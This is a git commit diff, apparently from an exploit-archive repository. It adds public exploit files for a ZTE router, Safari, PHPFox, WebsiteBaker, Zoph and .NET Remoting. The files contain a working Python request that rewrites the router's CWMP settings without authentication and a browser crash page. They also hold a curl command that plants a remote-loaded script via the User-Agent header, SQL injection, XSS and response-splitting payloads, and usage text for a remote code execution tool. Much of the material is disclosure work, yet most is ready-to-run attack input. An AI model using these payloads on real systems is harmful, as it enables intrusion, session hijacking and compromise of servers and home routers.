Updated 11_19_2014
This commit is contained in:
parent
892f0c3055
commit
a28bed7356
8 changed files with 682 additions and 0 deletions
|
@ -31767,3 +31767,10 @@ id,file,description,date,author,platform,type,port
|
|||
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
|
||||
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
|
||||
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
|
||||
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
|
||||
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
|
||||
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
|
||||
35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
|
||||
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
|
||||
35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
|
||||
35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
71
platforms/hardware/webapps/35276.txt
Executable file
71
platforms/hardware/webapps/35276.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
About the software
|
||||
==================
|
||||
|
||||
ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.
|
||||
|
||||
Vulnerability Details
|
||||
=====================
|
||||
|
||||
CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication.
|
||||
|
||||
Affected Products
|
||||
=================
|
||||
Device model : ZTE ZXHN H108L
|
||||
Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4
|
||||
|
||||
Proof of Concept
|
||||
================
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
|
||||
acs_server = "http://<server>:<port>"
|
||||
acs_user = "user"
|
||||
acs_pass = "pass"
|
||||
|
||||
# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
|
||||
# router will connect back to the ACS server.
|
||||
|
||||
conn_url = "/tr069"
|
||||
conn_port = "7564"
|
||||
conn_user = "user"
|
||||
conn_pass = "pass"
|
||||
|
||||
#Periodic inform parameters
|
||||
active = 1
|
||||
interval = 2000
|
||||
|
||||
payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
|
||||
|
||||
r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)
|
||||
|
||||
Impact
|
||||
======
|
||||
|
||||
The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page.
|
||||
|
||||
Severity
|
||||
========
|
||||
|
||||
Medium
|
||||
|
||||
References
|
||||
==========
|
||||
|
||||
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
|
||||
|
||||
|
||||
Disclosure Timeline
|
||||
===================
|
||||
|
||||
27/10/2014 - First communication attempt to both vendor and ISP
|
||||
04/11/2014 - ZTE response states that ISP should be contacted
|
||||
03/11/2014 - Second attempt to contact the ISP.
|
||||
14/11/2014 - No response from ISP. Public Disclosure
|
||||
|
||||
Contact Information
|
||||
===================
|
||||
Domain: https://projectzero.gr
|
||||
Social: twitter.com/projectzerolabs
|
||||
Contact: labs _at_ projectzero.gr
|
127
platforms/osx/dos/35279.html
Executable file
127
platforms/osx/dos/35279.html
Executable file
|
@ -0,0 +1,127 @@
|
|||
@w3bd3vil
|
||||
|
||||
<!DOCTYPE html>
|
||||
<head>
|
||||
<style>
|
||||
svg {
|
||||
padding-top: 1337%;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<svg viewBox="0 0 500 500" width="500" height="500">
|
||||
<polyline points="1 1,2 2"></polyline>
|
||||
</svg>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
Safari 8.0 / OSX 10.10
|
||||
|
||||
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
|
||||
frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
|
||||
libsystem_kernel.dylib`__pthread_kill + 10:
|
||||
-> 0x7fff8ab10282: jae 0x7fff8ab1028c ; __pthread_kill + 20
|
||||
0x7fff8ab10284: movq %rax, %rdi
|
||||
0x7fff8ab10287: jmp 0x7fff8ab0bca3 ; cerror_nocancel
|
||||
0x7fff8ab1028c: retq
|
||||
(lldb) register read
|
||||
General Purpose Registers:
|
||||
rax = 0x0000000000000000
|
||||
rbx = 0x0000000000000006
|
||||
rcx = 0x00007fff5b761d98
|
||||
rdx = 0x0000000000000000
|
||||
rdi = 0x000000000000140f
|
||||
rsi = 0x0000000000000006
|
||||
rbp = 0x00007fff5b761dc0
|
||||
rsp = 0x00007fff5b761d98
|
||||
r8 = 0x0000000000000000
|
||||
r9 = 0x00000000000000a8
|
||||
r10 = 0x0000000008000000
|
||||
r11 = 0x0000000000000206
|
||||
r12 = 0x00007fff84b36487 "transform_is_valid(m)"
|
||||
r13 = 0x0000000108c2c000
|
||||
r14 = 0x00007fff747ae300 libsystem_pthread.dylib`_thread
|
||||
r15 = 0x00007fff84b36477 "Paths/CGPath.cc"
|
||||
rip = 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
|
||||
rflags = 0x0000000000000206
|
||||
cs = 0x0000000000000007
|
||||
fs = 0x0000000000000000
|
||||
gs = 0x0000000000000000
|
||||
|
||||
(lldb) bt
|
||||
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
|
||||
* frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
|
||||
frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
|
||||
frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
|
||||
frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
|
||||
frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
|
||||
frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
|
||||
frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
|
||||
frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
|
||||
frame #8: 0x00007fff8f47a2fa WebCore`WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
|
||||
frame #9: 0x00007fff8f47a633 WebCore`WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
|
||||
frame #10: 0x00007fff8eab4aeb WebCore`WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
|
||||
frame #11: 0x00007fff8eab477d WebCore`WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1325
|
||||
frame #12: 0x00007fff8ea2c3f2 WebCore`WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
|
||||
frame #13: 0x00007fff8ef300a8 WebCore`WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
|
||||
frame #14: 0x00007fff8e9b1e83 WebCore`WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
|
||||
frame #15: 0x00007fff8e9b1929 WebCore`WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
|
||||
frame #16: 0x00007fff8e9613c6 WebCore`WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
|
||||
frame #17: 0x00007fff8e95e9a3 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
|
||||
frame #18: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
|
||||
frame #19: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
|
||||
frame #20: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
|
||||
frame #21: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
|
||||
frame #22: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
|
||||
frame #23: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
|
||||
frame #24: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
|
||||
frame #25: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
|
||||
frame #26: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
|
||||
frame #27: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
|
||||
frame #28: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
|
||||
frame #29: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
|
||||
frame #30: 0x00007fff8f3d74c9 WebCore`WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
|
||||
frame #31: 0x00007fff8e95eaa8 WebCore`WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
|
||||
frame #32: 0x00007fff8e95ea50 WebCore`WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
|
||||
frame #33: 0x00007fff8e95dd54 WebCore`WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
|
||||
frame #34: 0x00007fff8e95ffdf WebCore`WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
|
||||
frame #35: 0x00007fff8e95e8e2 WebCore`WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
|
||||
frame #36: 0x00007fff8e95e5b7 WebCore`WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
|
||||
frame #37: 0x00007fff8e95d252 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2386
|
||||
frame #38: 0x00007fff8e95c6e2 WebCore`WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
|
||||
frame #39: 0x00007fff8e95d392 WebCore`WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2706
|
||||
frame #40: 0x00007fff8e988376 WebCore`WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
|
||||
frame #41: 0x00007fff8f432baf WebCore`WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
|
||||
frame #42: 0x00007fff8ee86924 WebCore`WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
|
||||
frame #43: 0x00007fff8f3b2f59 WebCore`WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
|
||||
frame #44: 0x00007fff8f60f367 WebCore`WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
|
||||
frame #45: 0x00007fff8f6983fc WebCore`-[WebSimpleLayer drawInContext:] + 172
|
||||
frame #46: 0x00007fff85249355 QuartzCore`CABackingStoreUpdate_ + 3820
|
||||
frame #47: 0x00007fff85248463 QuartzCore`___ZN2CA5Layer8display_Ev_block_invoke + 59
|
||||
frame #48: 0x00007fff8524841f QuartzCore`x_blame_allocations + 81
|
||||
frame #49: 0x00007fff85247f1c QuartzCore`CA::Layer::display_() + 1546
|
||||
frame #50: 0x00007fff8f69831b WebCore`-[WebSimpleLayer display] + 43
|
||||
frame #51: 0x00007fff85247641 QuartzCore`CA::Layer::display_if_needed(CA::Transaction*) + 603
|
||||
frame #52: 0x00007fff85246d7d QuartzCore`CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
|
||||
frame #53: 0x00007fff8524650e QuartzCore`CA::Context::commit_transaction(CA::Transaction*) + 242
|
||||
frame #54: 0x00007fff85246164 QuartzCore`CA::Transaction::commit() + 390
|
||||
frame #55: 0x00007fff85256f55 QuartzCore`CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
|
||||
frame #56: 0x00007fff867e5d87 CoreFoundation`__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
|
||||
frame #57: 0x00007fff867e5ce0 CoreFoundation`__CFRunLoopDoObservers + 368
|
||||
frame #58: 0x00007fff867d7858 CoreFoundation`CFRunLoopRunSpecific + 328
|
||||
frame #59: 0x00007fff8434943f HIToolbox`RunCurrentEventLoopInMode + 235
|
||||
frame #60: 0x00007fff843491ba HIToolbox`ReceiveNextEventCommon + 431
|
||||
frame #61: 0x00007fff84348ffb HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71
|
||||
frame #62: 0x00007fff90583821 AppKit`_DPSNextEvent + 964
|
||||
frame #63: 0x00007fff90582fd0 AppKit`-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 194
|
||||
frame #64: 0x00007fff90576f73 AppKit`-[NSApplication run] + 594
|
||||
frame #65: 0x00007fff90562424 AppKit`NSApplicationMain + 1832
|
||||
frame #66: 0x00007fff8d881ef2 libxpc.dylib`_xpc_objc_main + 793
|
||||
frame #67: 0x00007fff8d883a9d libxpc.dylib`xpc_main + 490
|
||||
frame #68: 0x000000010449ab40 com.apple.WebKit.WebContent`___lldb_unnamed_function1$$com.apple.WebKit.WebContent + 16
|
||||
frame #69: 0x00007fff850755c9 libdyld.dylib`start + 1
|
||||
frame #70: 0x00007fff850755c9 libdyld.dylib`start + 1
|
||||
(lldb)
|
||||
-->
|
80
platforms/php/webapps/35274.txt
Executable file
80
platforms/php/webapps/35274.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
# Exploit Title: PHPFox XSS AdminCP
|
||||
# Date: 2014-10-22
|
||||
# Exploit Author: Wesley Henrique Leite aka "spyk2r"
|
||||
# Vendor Homepage: http://www.moxi9.com
|
||||
# Version: All version
|
||||
# CVE : CVE-2014-8469
|
||||
|
||||
# Response Vendor: fixed 2014-10-23 (to v4 Beta)
|
||||
|
||||
[+] DESCRIPTION
|
||||
|
||||
The system stores all urls accessed in a database table, below
|
||||
information in the same 'phpfox_log_session'
|
||||
|
||||
[phpfox]> desc phpfox_log_session;
|
||||
+---------------+----------------------+------+-----+---------+-------+
|
||||
| Field | Type | Null | Key | Default | Extra |
|
||||
+---------------+----------------------+------+-----+---------+-------+
|
||||
++++++++++ more values and
|
||||
| user_agent | varchar(100) | NO | | NULL | |
|
||||
+---------------+----------------------+------+-----+---------+-------+
|
||||
|
||||
the column that can be manipulated is:
|
||||
-> user_agent (100)
|
||||
|
||||
all acess store in the system, such as bots and users wandering around the
|
||||
web site, can be seen in:
|
||||
|
||||
AdminCP
|
||||
TOOLS > Online > Guests/Boots
|
||||
|
||||
Output
|
||||
| IP ADDRESS | User-Agent | ...
|
||||
|
||||
knowing this, the following code was created to inject a script into the
|
||||
AdminCP with User-Agent.
|
||||
|
||||
$ curl -A "<script src='http://www.example.com/script.js'></script>" \
|
||||
http://www.meusite.com.br/
|
||||
|
||||
OR
|
||||
|
||||
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/
|
||||
|
||||
when any user with administrative access in.
|
||||
'AdminCP'
|
||||
TOOLS > Online > Guests/Boots
|
||||
|
||||
we have the script running in the administrative area.
|
||||
|
||||
|
||||
[+] My Solution
|
||||
|
||||
(line 1.8)
|
||||
|
||||
1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php
|
||||
Tue Oct 21 10:00:11 2014 -0200
|
||||
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php
|
||||
Tue Oct 21 12:28:39 2014 -0200
|
||||
1.3 @@ -25,7 +25,7 @@
|
||||
1.4 {foreach from=$aGuests key=iKey item=aGuest}
|
||||
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">
|
||||
1.6 <td><a href="{url link='admincp.core.ip'
|
||||
search=$aGuest.ip_address_search}" title="{phrase
|
||||
var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>
|
||||
1.7 - <td>{$aGuest.user_agent}</td>
|
||||
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>
|
||||
1.9 <td class="t_center">
|
||||
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id}
|
||||
style="display:none;"{/if}>
|
||||
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0"
|
||||
class="js_item_active_link" title="{phrase var='admincp.unban'}">{img
|
||||
theme='misc/bullet_green.png' alt=''}</a>
|
||||
1.12 @@ -43,4 +43,4 @@
|
||||
1.13 <div class="extra_info">
|
||||
1.14 {phrase var='admincp.no_guests_online'}
|
||||
1.15 </div>
|
||||
1.16 -{/if}
|
||||
1.17 \ No newline at end of file
|
||||
1.18 +{/if}
|
111
platforms/php/webapps/35277.txt
Executable file
111
platforms/php/webapps/35277.txt
Executable file
|
@ -0,0 +1,111 @@
|
|||
=============================================
|
||||
MGC ALERT 2014-004
|
||||
- Original release date: March 11, 2014
|
||||
- Last revised: November 18, 2014
|
||||
- Discovered by: Manuel Garcia Cardenas
|
||||
- Severity: 10/10 (CVSS Base Score)
|
||||
=============================================
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
Multiple Vulnerabilities in WebsiteBaker 2.8.3
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
WebsiteBaker helps you to create the website you want: A free, easy and
|
||||
secure, flexible and extensible open source content management system (CMS).
|
||||
|
||||
III. DESCRIPTION
|
||||
-------------------------
|
||||
It is possible to inject SQL code in the variable "id" on the page
|
||||
"modify.php". This bug was found using the portal without authentication.
|
||||
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
|
||||
protocol to interact with the application.
|
||||
Has been detected a reflected XSS vulnerability in WebsiteBaker, that
|
||||
allows the execution of arbitrary HTML/script code to be executed in the
|
||||
context of the victim user's browser.
|
||||
An input validation problem exists within WebsiteBaker which allows
|
||||
injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n)
|
||||
characters into the server HTTP response header, resulting in a HTTP
|
||||
Response Splitting Vulnerability.
|
||||
|
||||
IV. PROOF OF CONCEPT
|
||||
-------------------------
|
||||
SQL Injection:
|
||||
|
||||
/wb/admin/pages/modify.php?page_id=1
|
||||
|
||||
Cross-Site Scripting GET:
|
||||
|
||||
/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
|
||||
/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1§ion_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
|
||||
/wb/modules/news/add_post.php?page_id=1§ion_id=f953a"><script>alert(1)</script>4ddf3369c1f
|
||||
/wb/modules/news/modify_group.php?page_id=1§ion_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
|
||||
/wb/modules/news/modify_post.php?page_id=1§ion_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
|
||||
/wb/modules/news/modify_settings.php?page_id=1§ion_id=%008b2f4"><script>alert(1)</script>bdc8b3919b5
|
||||
|
||||
HTTP RESPONSE SPLITTING:
|
||||
|
||||
If you enter a valid user and password, you can inject on the headers
|
||||
malicious code, example.
|
||||
|
||||
POST /wb/admin/login/index.php HTTP/1.1
|
||||
Content-Length: 204
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: http://192.168.244.129:80/wb/
|
||||
Host: 127.0.0.1
|
||||
Connection: Keep-alive
|
||||
Accept-Encoding: gzip,deflate
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
|
||||
like Gecko) Chrome/28.0.1500.63 Safari/537.36
|
||||
Accept: */*
|
||||
|
||||
password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&
|
||||
url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponse
|
||||
|
||||
You can inject a new header named: InjectedHeader:MaliciousCode because we
|
||||
inject a CR&LF new line with %0d%0a%20.
|
||||
|
||||
V. BUSINESS IMPACT
|
||||
-------------------------
|
||||
Public defacement, confidential data leakage, and database server
|
||||
compromise can result from these attacks. Client systems can also be
|
||||
targeted, and complete compromise of these client systems is also possible.
|
||||
|
||||
VI. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
WebsiteBaker <= 2.8.3
|
||||
|
||||
VII. SOLUTION
|
||||
-------------------------
|
||||
No news releases
|
||||
|
||||
VIII. REFERENCES
|
||||
-------------------------
|
||||
http://www.websitebaker.org
|
||||
|
||||
IX. CREDITS
|
||||
-------------------------
|
||||
This vulnerability has been discovered and reported
|
||||
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
|
||||
|
||||
X. REVISION HISTORY
|
||||
-------------------------
|
||||
March 11, 2014 1: Initial release
|
||||
|
||||
XI. DISCLOSURE TIMELINE
|
||||
-------------------------
|
||||
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
|
||||
March 11, 2014 2: Send to vendor
|
||||
June 05, 2014 3: Second mail to the verdor without response
|
||||
November 18, 2014 4: Sent to lists
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
|
||||
XIII. ABOUT
|
||||
-------------------------
|
||||
Manuel Garcia Cardenas
|
||||
Pentester
|
84
platforms/php/webapps/35278.txt
Executable file
84
platforms/php/webapps/35278.txt
Executable file
|
@ -0,0 +1,84 @@
|
|||
=============================================
|
||||
MGC ALERT 2014-005
|
||||
- Original release date: March 5, 2014
|
||||
- Last revised: November 18, 2014
|
||||
- Discovered by: Manuel Garcia Cardenas
|
||||
- Severity: 10/10 (CVSS Base Score)
|
||||
=============================================
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
Multiple Vulnerabilities in Zoph <= 0.9.1
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
Zoph (Zoph Organizes Photos) is a web based digital image presentation and
|
||||
management system. In other words, a photo album. It is built with PHP,
|
||||
MySQL and Perl.
|
||||
|
||||
III. DESCRIPTION
|
||||
-------------------------
|
||||
It is possible to inject SQL code in the variables "id" and "action" on the
|
||||
pages group, photos and user. This bug was found using the portal with
|
||||
authentication. To exploit the vulnerability only is needed use the version
|
||||
1.0 of the HTTP protocol to interact with the application.
|
||||
Has been detected a reflected XSS vulnerability in Zoph, that allows the
|
||||
execution of arbitrary HTML/script code to be executed in the context of
|
||||
the victim user's browser.
|
||||
|
||||
IV. PROOF OF CONCEPT
|
||||
-------------------------
|
||||
SQL Injection:
|
||||
|
||||
/zoph/php/group.php?_action=1'%22&_clear_crumbs=1
|
||||
/zoph/php/photos.php?location_id=1'%22
|
||||
/zoph/php/user.php?user_id=&_action=1'%22
|
||||
|
||||
Cross-Site Scripting GET:
|
||||
|
||||
/zoph/php/edit_photos.php?photographer_id=3"><script>alert(1)</script>
|
||||
/zoph/php/edit_photos.php?album_id=2&_crumb=3"><script>alert(1)</script>
|
||||
|
||||
V. BUSINESS IMPACT
|
||||
-------------------------
|
||||
Public defacement, confidential data leakage, and database server
|
||||
compromise can result from these attacks. Client systems can also be
|
||||
targeted, and complete compromise of these client systems is also possible.
|
||||
|
||||
VI. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
Zoph <= 0.9.1
|
||||
|
||||
VII. SOLUTION
|
||||
-------------------------
|
||||
No news releases
|
||||
|
||||
VIII. REFERENCES
|
||||
-------------------------
|
||||
http://www.zoph.org/
|
||||
|
||||
IX. CREDITS
|
||||
-------------------------
|
||||
This vulnerability has been discovered and reported
|
||||
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
|
||||
|
||||
X. REVISION HISTORY
|
||||
-------------------------
|
||||
March 11, 2014 1: Initial release
|
||||
|
||||
XI. DISCLOSURE TIMELINE
|
||||
-------------------------
|
||||
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
|
||||
March 5, 2014 2: Send to vendor
|
||||
June 17, 2014 3: Second mail to the verdor without response
|
||||
November 18, 2014 4: Sent to lists
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
|
||||
XIII. ABOUT
|
||||
-------------------------
|
||||
Manuel Garcia Cardenas
|
||||
Pentester
|
78
platforms/windows/remote/35280.txt
Executable file
78
platforms/windows/remote/35280.txt
Executable file
|
@ -0,0 +1,78 @@
|
|||
Source: https://github.com/tyranid/ExploitRemotingService
|
||||
Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip
|
||||
|
||||
ExploitRemotingService (c) 2014 James Forshaw
|
||||
=============================================
|
||||
|
||||
A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.
|
||||
It only works on Windows although some aspects _might_ work in Mono on *nix.
|
||||
|
||||
Usage Instructions:
|
||||
===================
|
||||
|
||||
ExploitRemotingService [options] uri command [command args]
|
||||
Copyright (c) James Forshaw 2014
|
||||
|
||||
Uri:
|
||||
The supported URI are as follows:
|
||||
tcp://host:port/ObjName - TCP connection on host and portname
|
||||
ipc://channel/ObjName - Named pipe channel
|
||||
|
||||
Options:
|
||||
|
||||
-s, --secure Enable secure mode
|
||||
-p, --port=VALUE Specify the local TCP port to listen on
|
||||
-i, --ipc=VALUE Specify listening pipe name for IPC channel
|
||||
--user=VALUE Specify username for secure mode
|
||||
--pass=VALUE Specify password for secure mode
|
||||
--ver=VALUE Specify version number for remote, 2 or 4
|
||||
--usecom Use DCOM backchannel instead of .NET remoting
|
||||
--remname=VALUE Specify the remote object name to register
|
